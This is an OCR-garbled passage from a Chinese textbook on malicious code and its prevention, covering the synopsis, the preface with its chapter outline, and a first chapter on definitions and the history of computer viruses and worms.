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内 容 简 介 


本 书 详细 介绍 恶意 代码 ( 含 传统 计算 机 病毒 ) 的 基本 原理 和 主要 防治 技术 ,深入 分 析 和 探讨 恶意 代码 
的 产生 机 制 .寄生 特点 .传播 方式 .危害 表现 以 及 防范 和 对 抗 等 方面 的 技术 ,主要 内 容 包 括 恶 意 代 码 的 基本 
含义 恶意 代码 的 理论 模型 、 恶意 代 码 的 结构 和 技术 特征 分 析 、 特 洛 伊 木 马 .勒索 软件 .Linux 系统 下 的 恶意 
代码 .蠕虫 .移动 终端 恶意 代码 、 恶 意 代 码 的 查 杀 方 法 和 防治 技术 ,以 及 常用 杀毒 软件 及 其 解决 方案 和 恶意 
代码 的 防治 策略 等 。 

本 书 通俗 易 懂 ,注重 理论 与 实践 相 结合 ,所 设计 的 教学 实验 覆盖 了 所 有 类 型 的 恶意 代码 ,使 读者 能 够 
举一反三 。 为 了 便于 教学 ,本 书 附带 教学 课件 、 实 验 用 源 代 码 以 及 辅助 应 用 程序 版 本 说 明 等 内 容 , 下 载 地 
址 为 www. tupwk. com. cn/downpage, 下 载 并 解压 缩 后 ,就 可 按照 教材 设计 的 实验 步骤 使 用 。 

本 书 可 作为 高 等 院 校 信息 安全 专业 和 计算 机 相关 专业 的 教材 ,也 可 供 广 大 系统 管理 员 、 计 算 机 安全 技 
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由 于 传统 的 计算 机 病毒 是 一 个 非常 狭义 的 定义 , 它 仅 仅 概括 了 感染 文件 (可 执行 文件 及 数 
据 文件 ) 和 引导 区 的 恶意 代码 ,无 法 描述 各 种 新 兴 恶 意 代码 的 特征 和 内 涵 。 鉴 于 此 ,本 
书 采 用 “恶意 代码 ”这 个 概念 来 概括 书 中 内 容 。 

恶意 代码 作为 信息 安全 领域 的 重要 一 环 ,近年 来 在 组 织 对 抗 、 国 家 博弈 、 社 会 稳定 
方面 发 挥 了 双 刃 剑 的 作用 ,引起 了 社会 各 界 的 广泛 重视 。 

本 书 的 主要 内 容 来 源 于 作者 在 计算 机 病毒 和 恶意 代码 领域 的 12 年 教学 经 验 、8 年 
恶意 代码 及 其 防范 研究 基础 以 及 前 期 编写 的 4 种 教材 。 本 书 的 前 身 《 计 算 机 病毒 及 其 
防范 技术 兴 计 算 机 病毒 及 其 防范 技术 (第 2 版 ) 兴 恶意 代码 防范 》 和 《恶意 代码 与 计算 
机 病毒 一 一 原理 、 技 术 和 实践 》 被 多 所 高 校 作 为 教材 ,得 到 了 大 家 的 支持 和 认可 。 同 
时 ,这 些 教材 也 分 别 获 得 了 “上 海 交 通 大 学 优秀 教材 特等 奖 ”“ 上 海 市 高 等 教育 教材 

书 中 重点 分 析 恶 意 代码 的 运行 机 制 ,并 通过 实验 的 方式 讲解 常见 恶意 代码 。 在 分 

恶意 代码 技术 的 基础 上 ,重点 分 析 恶 意 代码 的 检测 和 清除 技术 。 此 外 ,还 对 预防 恶意 
代码 的 策略 和 防治 方案 进行 了 探讨 。 全 书 共 分 12 章 , 具 体内 容 如 下 。 

第 1 章 : 恶意 代码 概述 。 本 章 主 要 介绍 恶意 代码 的 基本 概念 ,并 在 此 基础 上 讲述 
恶意 代码 的 关键 历史 转折 点 ,技术 分 类 ,传播 途径 、 感 染 症状 、 命 名 规则 及 未 来 发 展 趋势 
等 相关 问题 。 

第 2 曹 : 恶意 代码 模型 及 机 制 。 本 和 曹 主要 介绍 恶意 代码 的 理论 模型 ,如 基于 图 灵 
机 的 传统 计算 机 病毒 模型 .基于 递归 函数 的 计算 机 病毒 的 数学 模型 .恶意 代码 预防 理论 
模型 ,传统 计算 机 病毒 的 结构 及 工作 机 制 等 。 

第 3 章 : 传统 计算 机 病毒 。 本 童 主要 介绍 在 DOS、Windows 9x、Windows 2000 平 
台 下 传统 病毒 的 工作 机 制 和 编制 技术 ,并 以 3 种 平台 下 的 可 执行 文件 结构 为 线索 ,在 分 
析 这 些 文件 结构 的 基础 上 ,引入 不 同 平台 的 病毒 编制 技术 。 为 了 保证 教材 的 系统 性 ,本 
章 还 简要 介绍 引导 型 病毒 和 宏 病 毒 。 

第 4 革 : Linux 恶意 代码 技 术 。 本 草 在 了 解 Linux 安全 问题 的 基础 上 ,探讨 Linux 
恶意 代码 的 概念 ,分 析 Linux 可 执行 文件 格式 (ELF) 的 运行 机 制 。 

第 5 章 : 特洛伊 木马 。 为 了 使 读者 充分 了 解 特洛伊 木马 ,本章 详细 分 析 木 马 的 技 
术 特 征 、 木马 入 侵 的 一 些 常 用 技术 以 及 木马 入 侵 的 防范 和 清除 方法 。 此 外 ,还 对 几 款 党 
见 木马 程序 的 防范 经 验 做 了 较为 详细 的 说 明 。 
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第 6 草 : 移动 乔 能 终端 恶意 代码 。 本 划 以 手机 恶意 代码 为 主线 ,介绍 移动 终端 恶意 代 
码 的 概念 .技术 进展 和 防范 工具 ,使 读者 了 解 未 来 移动 终端 设备 上 的 威胁 。 特 别 是 详细 介绍 
Android 下 开发 恶意 行为 程序 的 技术 。 

第 7 章 : 蠕虫 。 本 章 主 要 介绍 近年 来 破坏 力 非常 大 的 肾 虫 (Worm) 的 基本 特征 、 技 术 特 
征 和 工作 机 制 , 并 且 详 细 介绍 基于 RPC 漏洞 和 U 盘 传 播 的 蠕虫 技术 。 

第 8 章 : 勒索 型 恶意 代码 。2013 年 兴起 的 勒索 型 恶意 代码 是 恶意 代码 领域 的 最 新 家 
族 。 本 和 草 主 要 介绍 勒索 型 恶意 代码 的 概念 `. 原理 .危害 及 防范 技术 。 以 最 流行 的 WannaCry 
为 例 ,讲解 勒索 型 恶意 代码 的 结构 及 源 人 代码。 同时, 本草 还 以 Hidden-Tear 为 例 , 设 计 了 一 
个 实验 。 

第 9 章 : 其 他 恶意 代码 。 本 章 对 近年 来 新 兴 的 流 谍 软件 ,Outlook 漏洞 恶意 代码 、 
WebPage 恶意 代码 、 僵 尸 网 络 、.Rootkit 恶意 代码 和 APT( 高 级 持续 威胁 ) 做 了 介绍 ,并 对 其 
中 典型 恶意 代码 的 编制 技术 做 了 详细 讲解 。 

第 10 草 : 恶意 代码 防范 技术 。 本 章 以 检测 .清除 、 预防、 防治 数据 和 策略 6 个 层次 为 
主要 思路 ,介绍 恶意 代码 的 诊断 原理 和 方法 清除 原理 和 方法 .主动 和 被 动 防治 技术 以 及 数 
据 备 份 和 数据 恢复 等 。 

第 11 草 : 常用 杀毒 软件 及 其 解决 方案 。 本 划 通 过 介绍 企业 网 络 的 典型 结构 、 典 型 应 用 
和 网 络 时 代 的 病毒 特征 ,得 出 企业 网 络 防范 恶意 代码 体系 对 技术 和 工具 的 需求 ,从 而 给 出 一 
些 典 型 恶意 代码 防治 体系 解决 方案 。 

第 12 章 : 恶意 代码 防治 策略 。 本 草 通 过 讨论 防御 性 策略 得 到 的 不 同 建议 来 避免 计算 
机 受到 恶意 代码 的 影响 。 本 章 侧 重 于 全 局 策略 和 规章 ,并 且 针 对 企业 用 户 所 讲述 的 内 容 比 
针对 单机 用 户 的 要 多 一 些 。 本 章 还 就 如 何 制 订 一 个 防御 计划 ,如 何 挑选 一 个 快速 反应 小 组 ， 
如 何 控 制 住 恶意 代码 的 发 作 ,以 及 安全 工具 的 选择 等 问题 提出 了 一 些 建议 。 

在 本 书 完 稿 之 际 , 作 者 对 上 海 交 通 大 学 教材 出 版 基金 的 资助 表示 衷心 感谢 ; 感谢 教学 
12 年 来 听 过 作者 计算 机 病毒 原理 和 恶意 代码 防范 课程 的 所 有 学 生 ,他 们 为 作者 的 讲义 提出 
了 很 多 宝贵 意见 ; 感谢 各 类 参考 资料 的 提供 者 ,这些 资 料 既 充实 了 作者 的 教材 ,也 丰富 了 作 
者 的 知识 ; 感谢 清华 大 学 出 版 社 的 各 位 编辑 ,他 们 耐心 地 加 工 我 的 书稿 。 

为 便于 教学 ,本 书 提供 教学 课件 和 实验 源 代码 ,可 通过 清华 大 学 出 版 社 的 官方 网 站 
(www. tup. com. cn) 下 载 。 

由 于 作者 水 平 有 限 , 书 中 难免 有 下 漏 之 处 ,恳请 读者 批评 指正 ,以 使 本 书 得 以 进一步 改进 
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随 着 信息 技术 .互联 网 技术 ,特别 是 信息 安全 技术 的 发 展 , 计 算 机 病毒 的 概念 越 来 越 不 
能 全 面 反 映 其 内 涵 了 ,恶意 代码 的 概念 被 适时 地 提出 ,并 逐渐 为 人 们 接受 和 使 用 。 随 着 恶意 
代码 技术 的 发 展 ,恶意 代码 的 数量 也 在 迅速 增加 。2016 年 ,腾讯 电脑 管家 反 病 毒 实验 室 新 
发 现 病毒 1. 48 亿 个 ; 360 互联 网 安全 中 心 共 截 获 PC 端 新 增 恶意 程序 样本 1. 9 亿 个 ; 守门 
铁 克 共 发 现 3. 57 亿 个 恶意 软件 新 变种 。 据 国家 计算 机 网 络 应 急 技术 处 理 协 调 中 心 
(CNCERT/CC) 统 计 ,2016 年 CNCERTVCC 通过 自主 捕获 和 厂商 交换 获得 的 移动 互联 网 
恶意 程序 数量 205 万 余 个 ,2017 年 为 253 万 余 个 ,近年 持续 保持 高 速 增长 趋势 。 此 外 ,监测 
发 现 , 目 前 活跃 在 智能 联网 设备 上 的 恶意 程序 家 族 也 超过 12 种 。 究 竟 有 多 少 恶意 代码 存在 
于 世 , 这 是 个 不 可 解 的 问题 。 

为 什么 会 提出 恶意 代码 的 概念 ? 恶意 代码 和 计算 机 病毒 究竟 有 怎样 的 关系 ? 恶意 代码 
究竟 包含 哪些 内 容 ? 恶意 代码 是 怎样 一 步 一 步 从 无 到 有 发 展 壮 大 的 ?请 读者 带 着 这 些 问题 
来 阅读 本 曹 内 容 。 

本 章 主 要 介绍 恶意 代码 的 基本 概念 ,并 在 此 基础 上 介绍 恶意 代码 的 发 展 历 史 、 分 类 、 传 
播 途 径 .感染 症状 、 命 名 规则 及 未 来 发 展 趋势 等 相关 问题 。 

本 章 学 习 目标 

(1) 明确 恶意 代码 的 基本 概念 。 

(2) 了 解 恶 意 代码 的 发 展 历史 。 

(3) 熟悉 恶意 代码 的 分 类 。 

(4) 熟悉 恶意 代码 的 命名 规则 。 

(5) 了 解 恶 意 代码 未 来 的 发 展 趋势 。 


1.1 为 什么 提出 恶意 代码 的 概念 


国务 院 颁布 的 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》, 以 及 公安 部 出 台 的 《 计 
算 机 病毒 防治 管理 办 法 ) 将 计算 机 病毒 均 定义 为 : 计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 
中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 
指令 或 者 程序 代码 。 

我 国 刑 法 规定 ,故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 
果 严 重 的 ,依照 破坏 计算 机 信息 系统 罪 定罪 处 罚 。 而 在 互联 网 中 流行 的 蠕虫 、 木 马 是 否 属于 
刑法 上 的 计算 机 病毒 等 破坏 性 程序 ,目前 还 没有 立法 或 者 司法 解释 。 根 据 上 述 有 关 计 算 机 
病毒 的 定义 ,感染 文件 的 普通 病毒 属于 计算 机 病毒 ,但 是 蠕虫 (部 分 )\ 木 马 ( 绝 大 部 分 ) 并 不 
进行 自我 复制 ,因此 不 符合 病毒 的 特征 ,不 属于 计算 机 病毒 ,而 它 的 危害 性 却 是 巨大 的 ,因为 
它 包 含 能 够 在 触发 时 导致 数据 丢失 其 至 被 锚 取 的 恶意 代码 。 
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有 关 专 家 认为 ,如 果 根 据 相 关 部 门 发 布 的 条 例 来 理解 ,将 蠕 忠 和 木马 解释 为 计算 机 病毒 
是 不 符合 刑法 定罪 原则 的 ,而 里 忠和 木马 是 否 属于 “计算 机 病毒 等 破坏 性 程序 ”, 我 国法 律 没 
有 对 此 作出 解释 。 蠕 虫 和 木马 的 大 量 出 现 对 刑法 的 部 分 规定 提出 了 挑战 ,对 刑法 规定 的 破 
坏 性 程序 必须 作出 明确 的 界定 。 由 此 可 见 , 网 络 恶 意 代码 技术 的 发 展 ,导致 刑法 在 这 方面 的 
规定 显现 淖 后 。 因 此 ,必须 通过 立法 将 木马 .蠕虫 等 恶意 代码 纳入 破坏 性 程序 范围 。 

在 美国 ,有 些 州 (如 加 利 福 尼 亚 、 西 弗吉尼亚 等 ) 的 地 方法 规 中 ,把 恶意 代码 解释 成 计算 
机 系统 的 污染 物 。 显 然 ,它们 的 法 律 适用 面 更 加 宽泛 。 

在 信息 安全 技术 领域 ,重新 审视 目前 流行 的 破坏 性 程序 ,有 很 多 已 经 不 能 用 “计算 机 病 
毒 ” 这 个 概念 来 解释 了 。 以 下 从 两 个 方面 进一步 说 明 . 就 恶意 代码 的 类 型 而 言 ,这 些 破坏 性 
程序 除了 木马 之 外 ,还 有 网 络 伪 尸 \ 流 谍 软 件 、 人 逻辑 炸弹 、 网 络 钓鱼 、 恶 意 脚 本 等 。 就 感染 平 
台 而 言 ,传统 的 计算 机 病毒 的 定义 仅仅 局 限于 计算 机 平台 ,而 智能 手机 恶意 代码 则 运行 于 手 
机 平台 。 关 于 手机 上 的 恶意 代码 就 不 能 简单 地 归 类 于 传统 的 计算 机 病毒 概念 了 。 

在 法 律 领 域 , 专 家 们 努力 的 方向 是 扩大 法 律 解 释 范 围 , 把 新 型 的 破坏 性 程序 及 时 补充 到 
法 律 条 文中 。 在 技术 领域 ,专家 们 的 责任 更 是 责 无 劳 贷 , 因 此 ,需要 一 个 新 的 概念 来 概括 这 
些 破 坏 性 程序 。 这 个 新 的 概念 就 是 “恶意 代码 ”。 


1.2 恶意 代码 的 概念 


Ed Skoudis 和 Lenny Zeltser 在 Malware: Fighting Malicious Code 中 给 出 的 恶意 代 
码 定义 为 : 运行 在 目标 计算 机 上 ,使 系统 按照 攻击 者 意愿 执行 任务 的 一 组 指令 。 

在 维基 百科 中 ,恶意 代码 的 英文 对 照 词 是 Malware, 也 就 是 Malicious Software 的 混成 
词 。 恶意 代码 的 定义 描述 为 : 恶意 代码 是 在 未 被 授权 的 情况 下 ,以 破坏 软 硬 件 设备 、 禄 取 用 
户 信 息 、 扰 乱用 户 心 理 \ 干 扰 用 户 正 常 使 用 为 目的 而 编制 的 软件 或 代码 片段 。 这 个 定义 涵盖 
的 范围 非常 广泛 , 它 包含 了 所 有 敌意 、 插 入 ,和 干扰、 讨厌 的 程序 和 源 代 码 。 一 个 软件 被 看 作 是 
恶意 代码 主要 是 依据 创作 者 的 意图 ,而 不 是 恶意 代码 本 吴 的 特征 。 

依据 这 个 定义 ,恶意 代码 将 包括 计算 机 病毒 (Computer Virus)、 蠕虫 (Worm) ,特洛伊 
木马 (Trojan Horses)、Rootkit 间谍 软件 (Spyware) 恶意 广告 (Dishonest Adware) .流氓 软 
件 (Crimeware) 、 人 逻辑 炸弹 (Logic Boom)、 后 门 (Back Door) 僵尸 网 络 (Botnet)、 网 络 钓鱼 
(Phishing)、 恶意 脚本 (Malice Script) 垃圾 信息 (Spam)、 智 能 终端 恶意 代码 (Malware in 
Intelligent Terminal Device) 等 恶意 的 或 讨厌 的 软件 及 代码 片段 。 国 际 上 目前 新 出 现 了 一 
种 以 “扰乱 用 户 心 理 " 为 目的 的 软件 ,也 应 该 属于 恶意 代码 的 范畴 。 由 于 这 类 软件 的 使 用 范 
围 非 常 小 ,因此 不 为 人 们 所 熟知 。 在 这 个 定义 范围 内 ,恶意 代码 不 是 有 缺陷 的 软件 ,也 就 是 
说 ,包含 有 害 漏洞 但 其 目的 合法 的 软件 不 是 恶意 代码 。 例 如 ,微软 的 Windows 操作 系统 , 尽 
管 也 包含 很 多 有 害 漏 洞 ,但 因为 其 目的 是 合法 的 ,因此 ,Windows 不 是 恶意 代码 。 

恶意 代码 是 一 个 具有 特殊 功能 的 程序 或 代码 片段 ,就 像 生 物 病毒 一 样 ,恶意 代码 具有 独 
特 的 传播 和 破坏 能 力 。 亚 意 代 码 可 以 很 快 地 蔓延 ,又 稼 稼 难以 根除 。 它 们 能 把 自身 附 厦 在 
各 种 类 型 的 对 象 上 , 当 寄 生 了 恶意 代码 的 对 象 从 一 个 用 户 到 达 另 一 个 用 户 时 ,它们 就 随同 该 
对 象 一 起 蔓延 开 来 。 除 传播 和 复制 能 力 外 , 某 些 恶意 代码 还 有 其 他 一 些 特 殊 性 能 ,例如 , 特 
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洛 伊 木马 具有 和 祝 取 信息 的 特性 , 流 谍 软件 具有 干扰 用 户 的 特性 ,而 蠕虫 则 主要 具有 利用 漏洞 
传播 来 占用 市 宪 、 耗 费 资源 等 特性 。 

迄今 为 止 ,各 种 恶意 代码 表现 出 不 同 的 特征 ,但 总 结 起 来 ,恶意 代码 具有 以 下 3 个 明显 
的 共同 特征 。 

1. 目的 性 

目的 性 是 恶意 代码 的 基本 特征 ,是 判别 一 个 程序 或 代码 片段 是 否 为 恶意 代码 的 最 重要 
的 特征 ,也 是 法 律 上 判断 恶意 代码 的 标准 。 

2. 传播 性 

传播 性 是 恶意 代码 体现 其 生命 力 的 重要 手段 。 恶 意 代 码 总 是 通过 各 种 手段 把 自己 传播 
出 去 ,到达 尽 可 能 多 的 软 硬 件 环境 。 

3. 破坏 性 


破坏 性 是 恶意 代码 的 表现 手段 。 任 何 恶 意 代 码 传 播 到 了 新 的 软 人 硬件 系统 后 ,都 会 对 系 
统 产 生 不 同 程度 的 影响 。 它 们 发 作 时 轻 则 占用 系统 资源 ,影响 系统 运行 速度 ,降低 系统 工作 
效率 ,使 用 户 不 能 正常 使 用 系统 , 重 则 破坏 用 户 系 统 数据 ,甚至 破坏 系统 硬件 ,给 用 户 带 来 巨 
大 的 损失 。 


1.3 恶意 代码 的 发 展 历史 


恶意 代码 的 产生 原因 多 种 多 样 , 有 的 是 计算 机 工作 人 员 或 业余 爱好 者 纯粹 为 了 寻 开 心 
而 制造 出 来 的 ,有 的 则 是 软件 公司 为 防止 自己 的 产品 被 非法 复制 而 制造 的 ,这 些 情况 助长 了 
恶意 代码 的 制作 和 传播 。 还 有 一 种 情况 就 是 蓄意 破坏 , 它 分 为 个 人 行为 和 政府 行为 两 种 。 
个 人 行为 多 为 雇员 对 雇主 的 报复 行为 ,而 政府 行为 则 是 有 组 织 的 战略 战术 手段 。 在 “海湾 战 
争 ” 中 ,美国 国防 部 的 某 个 机 构 曾 对 伊拉克 的 通信 系统 进行 了 有 计划 的 恶意 代码 攻击 ,一度 
使 伊拉克 的 国防 通信 系统 陷于 瘫痪 。 男 外 还 有 些 恶 意 代 码 是 用 于 人 研究 或 实验 而 设计 的 “有 
用 ”程序 ,由 于 某 种 原因 失去 控制 而 扩散 出 去 ,成 为 危害 四 方 的 恶意 代码 。 但 是 ,无 论 基于 什 
么 目的 而 产生 的 恶意 代码 ,都 给 用 户 带 来 了 非常 大 的 危害 。 

2008 年 12 月 5 日 ,在 卡巴 斯 基 实 验 室 举办 的 病毒 分 析 师 峰会 上 ,卡巴 斯 基 实 验 室 的 高 
级 区 域 研究 师 David Emm 发 表 了 关于 恶意 代码 市 场 分 析 的 主题 演讲 。David 在 主题 演讲 
中 指出 ,恶意 代码 的 数量 每 秒 钟 都 在 增长 ,到 2008 年 年 底 为 止 , 全 球 大 约 存 在 恶意 代码 140 
万 种 。2017 年 腾讯 电脑 管家 统计 数据 显示 ,PC 端 总 计 已 拦截 恶意 代码 近 30 亿 次 ,截获 
Android 新 增 恶 意 代 码 总 数 达 1545 万 种 。 

本 节 以 恶意 代码 发 展 过 程 中 的 关键 环节 为 主线 ,回顾 恶意 代码 从 出 现 到 道 勃 发 展 的 历 
史 过 程 中 的 一 些 关 键 环节 。 


1.3.1 概念 阶段 


自从 1946 年 第 一 台电 子 积分 数字 计算 机 ENIAC 问世 以 来 ,计算 机 与 人 们 的 生活 已 经 
越 来 越 息 息 相 关 了 ,人 们 甚至 已 经 无 法 在 没有 计算 机 的 世界 里 生活 了 。 但 是 人 们 发 现 就 如 
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同人 会 生病 一 样 ,计算 机 的 世界 里 也 存在 病毒 ,计算 机 也 会 感染 病毒 。 那 么 ,恶意 代码 是 如 
何 一 步 一 步 地 从 无 到 有 、 从 小 到 大 发 展 到 今天 的 呢 ? 接 下 来 的 介绍 可 以 解答 这 一 问题 。 

其 实 ,恶意 代码 的 初始 阶段 都 集中 体现 为 计算 机 病毒 这 一 典型 的 恶意 代码 。 在 第 一 台 
商用 计算 机 出 现 之 前 ,1949 年 伟大 的 计算 机 技术 先驱 一 一 冯 “， 诺 依 曼 (John von Neumann) 
在 他 的 一 篇 论文 (复杂 月 动 装置 的 理论 及 组 织 的 进行 ) 中 ,就 已 经 勾勒 出 了 病毒 的 蓝图 ,认为 
存在 大 能 进行 日 我 繁殖 的 计算 机 程序 ,当时 绝 大 部 分 的 计算 机 专家 都 无 法 想象 。 

计算 机 病毒 这 个 词 请 最 早 是 出 现在 科幻 小 说 中 的 。1977 年 夏天 ,托马斯 "瑞安 
(Thomas J. Ryan) 的 科幻 小 说 人 《P-1 的 春天 》(The Adolescence of P-1) 成 为 美国 的 畅销 书 。 
作者 在 这 本 书 中 描写 了 一 种 可 以 在 计算 机 中 互相 传染 的 病毒 ,病毒 最 后 控制 了 7000 台 计 算 
机 ,造成 了 一 场 灾 难 。 不 过 ,这 在 当时 并 没有 引起 人 们 的 注意 。 


1.3.2 膜 腌 阶段 


人 磁 忌 大战 (Core War 或 Core Wars) 是 在 汉 “， 详 依 曼 病毒 程序 蓝图 的 基础 上 提出 的 概 
念 。20 世纪 60 年 代 在 美国 电话 电报 公司 (AT& 人 TT) 的 贝尔 (Bel) 实 验 室 工作 的 3 个 年 轻 程序 
员 道 格拉 斯 。 麦 基 尔 罗 伊 (CH. Douglas Mcllroy) 、. 维 殉 多 。 维 索 特 斯 克 (Victor Vysottsky) 以 及 
罗 们 特 。 莫 里 斯 (Robert T. Morris) 创 造 了 该 电子 游戏 ,实现 程序 的 日 我 蚂 殖 。 

人 磁 忆 大 战 的 玩法 为 : 双方 各 写 一 套 程 序 并 输入 同一 部 计算 机 中 ,这 两 套 程序 在 计算 机 
系统 内 互相 追 杀 , 有 时 它们 会 放置 一 些 关 卡 甚 至 有 时 会 停 下 来 修复 被 对 方 破坏 的 几 行 指令 。 
当 被 困 时 ,它们 可 以 把 目 己 复制 一 次 从 而 逃离 险 境 ,因为 它们 都 在 计算 机 的 记忆 和 磁 忌 中洲 
走 , 因 此 得 名 磁 忆 大 战 。 这 个 游戏 的 特点 在 于 双方 的 程序 进入 计算 机 之 后 , 玩 游戏 的 人 只 能 
看 着 屏 医 上 显示 的 战况 ,而 不 能 做 任何 更 改 , 直 到 某 一 方 的 程序 被 另 一 方 的 程序 完全 “ 吃 掉 ” 
为 止 。 


1.3.3 第 一 款 真实 恶意 代码 


1983 年 11 月 3 日 , 弗 雷 德 . 科恩 (Fred Cohen) 博 士 研制 出 一 种 在 运行 过 程 中 可 以 复 
制 自身 的 破坏 性 程序 。 伦 ， 艾 德 勒 曼 (Len Adleman) 将 这 种 破坏 性 程序 命名 为 计算 机 病毒 
(Computer Viruses) ,并 在 每 周一 次 的 计算 机 安全 讨论 会 上 正式 提出 ,8 小 时 后 专家 们 在 
VAX 117/50 计算 机 系统 上 成 功 运行 该 程序 。 就 这 样 ,第 一 个 恶意 代码 实验 成 功 。 这 是 人 
们 第 一 次 真正 意识 到 计算 机 病毒 的 存在 。 


1.3.4 PC 病毒 


1986 年 年 初 ,巴基斯坦 的 巴 斯 特 (Basit) 和 阿 姆 杰 德 (Amjad) 两 兄弟 编写 了 Pakistan 病 
毒 , 即 Brain。Brain 是 第 一 个 感染 PC 的 恶意 代码 。 随 着 PC 的 造 勃 发 展 , 恶 意 代 码 迅 速 发 
展 壮大 起 来 。 

1987 年 世界 各 地 的 计算 机 用 户 几 乎 同时 发 现 了 形形色色 的 计算 机 病毒 ,如 大 麻 、IBM 
圣诞 树 .黑色 星期 五 等 。 面 对 计算 机 病毒 的 突然 袭击 ,众多 计算 机 用 户 甚至 专业 人 员 都 惊 刁 
失措 。 

1988 年 3 月 2 日 ,一 种 苹果 电脑 的 恶意 代码 改作。 这 天 受 感 染 的 苹果 电脑 停止 工作 ， 
只 显示 “向 折 有 苹果 电脑 的 使 用 者 宣布 和 平 的 信息 ”, 以 庆祝 苹果 电脑 生日 。 这 是 第 一 个 感 


染 窗 口 系统 的 恶意 代码 。 

1989 年 全 世界 的 计算 机 病毒 攻击 十 分 猩 狐 ,我 国 也 未 能 和 位 免 。 其 中 " 米 开 明基 罗 病毒 
给 许多 计算 机 用 户 造成 了 极 大 的 损失 。 这 个 病毒 比较 着 名 的 原因 ,除了 它 拥有 一 代 乞 术 大 
师 米 开明 基 罗 的 名 字 之 外 ,更 重要 的 是 它 的 破坏 力 非 党 强大 。 


1.3.5 蠕虫 插曲 


1988 年 冬天 ,正在 美国 康 奈 尔 大 学 攻读 的 喝 里 斯 ,把 一 个 被 称 为 “蠕虫 ”的 计算 机 病毒 
送 进 了 美国 最 大 的 计算 机 网 络 一 一 互联 网 。1988 年 11 月 2 日 下 午 5 点 ,互联 网 的 管理 人 
员 首 次 发 现 网络 有 不 明和 侵 者 。 当 晚 ,从 美国 东海 着 到 西海 涯 ,互联 网 用 户 陷 和 人 一 片 恐 惰 。 
由 于 当时 的 网 络 非常 有 限 , 其 破坏 力 没 有 得 到 充分 发 挥 。 其 实 , 蠕 虫 的 概念 起 源 更 早 , 在 
1982 年 ,Shock 和 Hupp 根据 The Shockwave Rider 一 书 中 的 概念 提出 了 一 种 "蠕虫 ” 
(Wormy) 程 序 的 思想 。 里 虫 的 真正 爆发 却 在 十 多 年 后 ,20 世纪 初 , 蠕 虫 在 互联 网 中 大 爆发 ， 
其 原理 正 是 来 日 英里 斯 的 蠕虫 。 


1.3.6 走向 战争 


1991 年 在 “海湾 战争 "中 ,美军 第 一 次 将 计算 机 病毒 用 于 实战 ,在 空 衫 巴格达 的 战斗 前 ， 
成 功 地 破坏 了 对 方 的 指挥 系统 ,使 之 瘫痪 ,保证 了 战斗 的 顺利 进行 ,下 至 最 后 胜利 。 


1.3.7 对 抗 杀 毒 软件 


1992 年 出 现 了 针对 杀毒 软件 的 “幽灵 ?病毒 ,如 One-Hal{f。 该 病毒 直接 挑战 简单 的 特征 
码 扫 摘 技 术 ,随后 各 个 安全 厂商 推出 了 局 发 式 扫 描 、 含 有 通配符 的 特征 码 等 技术 来 应 对 幽灵 
型 病毒 。 


1.3.8 与 病毒 不 绸 困难 


1996 年 首次 出 现 针对 微软 公司 Office 的 “ 宏 病 毒 "。 宏 病毒 的 出 现 使 病毒 编制 工作 不 
青 局 限于 星 深 难 懂 的 汇编 语言 。 由 于 书写 简单 , 越 来 越 多 的 恶意 代码 出 现 了 。1997 年 被 公 
认为 信息 安全 界 的 “ 宏 病 毒 年 "。 宏 病毒 主要 感染 Word、Excel 等 文件 。 例 如 Word 宏 病 
毒 ,早期 是 用 一 种 专门 的 BASIC 语言 , 即 Word Basic 所 编写 的 程序 ,后 来 使 用 Visual 
Basic。 与 其 他 计算 机 病毒 一 样 , 它 能 对 用 户 系 统 中 的 可 执行 文件 和 数据 文本 类 文件 造成 破 
坏 。 第 见 的 宏 病毒 有 Taiwan NO.1( 台 湾 一 号 )、Setmd、Consept、Mdma 等 。 


1.3.9 破坏 硬件 的 病毒 


1998 年 出 现 针 对 Windows 95/ Windows 98 系统 的 CIH 病毒 (1999 年 被 公认 为 计算 机 
反 病 毒 界 的 CIH 病毒 年 ) 。CIH 病毒 是 继 DOS 病毒 、Windows 病毒 、 宏 病毒 后 的 第 四 类 新 
型 病毒 。 这 种 病毒 与 DOS 下 的 传统 病毒 有 很 大 区 别 , 它 是 使 用 面向 Windows 的 VXD 技术 
来 编制 的 。1998 年 8 月 从 台湾 传人 大 陆 的 CIH 病毒 ,其 发 展 过 程 经 历 了 v1.0、vl. 1 v1.2、 
vl.3、vl.4 总 共 5 个 版 本 。 该 病毒 是 第 一 个 直接 攻击 破坏 人 硬件 的 计算 机 病毒 ,是 破坏 最 为 
严重 的 病毒 之 一 。 它 主要 感染 Windows 95/ Windows 98 的 可 执行 程序 ,发 作 时 破坏 计算 机 
Flash BIOS 芯片 中 的 系统 程序 ,导致 主板 损坏 ,同时 破坏 人 硬盘 中 的 数据 。 病 毒 发 作 时 ,人 硬盘 
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驱动 器 不 停 旋转 ,硬盘 上 的 所 有 数据 (包括 分 区 表 ) 被 破坏 ,必须 对 硬盘 重新 分 区 才 有 可 能 挽 
救 便 盘 。 同 时 ,对 于 部 分 三 牌 的 主板 (如 技 吉 和 微星 等 ) ,会 将 Flash BIOS 中 的 系统 程序 破 
坏 , 造 成 开机 后 系统 无 反应 。1999 年 4 月 26 日 ,CIH 病毒 在 全 球 范围 大 规模 爆发 ,造成 近 
6000 万 台 计 算 机 瘫痪 ,估计 经 济 损失 在 100 亿美 元 左右 。 


1.3.10 网 络 时 代 : 蠕虫 


1999 年 Happy99 等 完全 通过 Internet 传播 的 蠕虫 的 出 现 标志 者 网 络 恶 意 代 人 码 成 为 新 
的 挑战 。 其 特点 就 是 利用 Internet 的 优势 ,快速 进行 大 规模 的 传播 ,从 而 使 晴 虫 在 极 短 的 时 
间 内 过 布 全 球 。 

2000 年 爱 虫 病毒 通过 Outlook 电子 邮件 系统 传播 ,邮件 主题 为 "I Love You”, 并 包含 一 
个 附件 。 一 旦 打开 这 个 邮件 ,系统 就 会 自动 复制 并 向 地 址 泗 中 的 所 有 邮件 地 址 发 送 这 个 病 
毒 ,邮件 系统 将 会 变 慢 , 并 可 能 导致 整个 网 络 系统 朋 尝 。 由 于 是 通过 电子 邮件 系统 传播 , 爱 
虫 病毒 在 很 短 的 时 间 内 就 袭击 了 全 球 无 以 数 计 的 计算 机 ,甚至 美国 国防 部 的 多 个 安全 部 门 、 
